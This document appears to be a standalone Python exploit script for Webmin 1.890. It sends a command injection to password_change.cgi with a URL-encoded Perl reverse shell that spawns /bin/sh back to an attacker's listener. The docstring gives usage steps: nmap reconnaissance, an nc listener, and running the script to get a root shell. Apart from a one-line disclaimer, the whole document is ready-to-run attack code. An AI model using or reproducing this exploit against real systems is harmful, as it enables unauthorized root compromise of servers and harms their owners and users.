webmin_exploit.py

#!/usr/bin/env python3
"""
This python script should give you a root shell on Webmin 1.890

Check with nmap:
nmap -sC -sV -p 10000 TARGET_IP

Result:
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)

How to use this exploit:

Step 1:
nc -lnvp LPORT

Step 2:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT

RHOST = the target
RPORT = the target IP address (Usually 10000)
LHOST = your kali box
LPORT = your reverse shell port

Step 3:
Get a root shell!

DO NOT HARM UNAUTHORIZED SYSTEMS!!!

"""
import requests
import urllib
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)



def webminExploit(rhost, rport, lhost, lport):

	url = "https://" + rhost + ":" + rport
	print(url)

	print("[!] Checking target https://{}:{}".format(rhost, rport))
	r = requests.get(url, verify=False)

	headers = {}
	headers['Referer'] = str(url+"/")

	print("[+] Sending the exploit!")
	r2 = requests.post(url + "/password_change.cgi",headers=headers, verify=False, data="expired=echo%20QosaAPO6jTr&new1=QosaAPO6jTr&new2=QosaAPO6jTr&old=echo%20QosaAPO6jTr")
	shellie = "perl%20-e%20%27use%20Socket%3B%24i%3D%22"+LHOST+"%22%3B%24p%3D"+LPORT+"%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22/bin/sh%20-i%22%29%3B%7D%3B%27"
	r2 = requests.post(url + "/password_change.cgi",headers=headers, verify=False, data="expired="+shellie)



RHOST = sys.argv[1]
RPORT = str(sys.argv[2])
LHOST = sys.argv[3]
LPORT = str(sys.argv[4])

webminExploit(RHOST, RPORT, LHOST, LPORT)